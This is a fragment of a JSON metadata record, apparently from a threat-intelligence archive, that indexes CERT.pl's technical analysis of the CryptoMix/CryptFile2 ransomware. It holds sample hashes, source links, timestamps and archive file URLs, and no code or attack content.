sample1\r\n0d1206246bf15c521474cee42f13fc09 sample1 decrypted\r\nb778bda5b97228c6e362c9c4ae004a19 sample2\r\n042a38a32cd20e3e190bb15b085b430a sample2 decrypted\r\nSource: https://www.cert.pl/en/news/single/technical-analysis-of-cryptomixcryptfile2-ransomware/\r\nhttps://www.cert.pl/en/news/single/technical-analysis-of-cryptomixcryptfile2-ransomware/\r\nPage 17 of 17",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://www.cert.pl/en/news/single/technical-analysis-of-cryptomixcryptfile2-ransomware/"
	],
	"report_names": [
		"technical-analysis-of-cryptomixcryptfile2-ransomware"
	],
	"threat_actors": [],
	"ts_created_at": 1775434860,
	"ts_updated_at": 1775791298,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/af7d428f50137b7a36a4975678dfe98bc20a9bfd.pdf",
		"text": "https://archive.orkl.eu/af7d428f50137b7a36a4975678dfe98bc20a9bfd.txt",
		"img": "https://archive.orkl.eu/af7d428f50137b7a36a4975678dfe98bc20a9bfd.jpg"
	}
}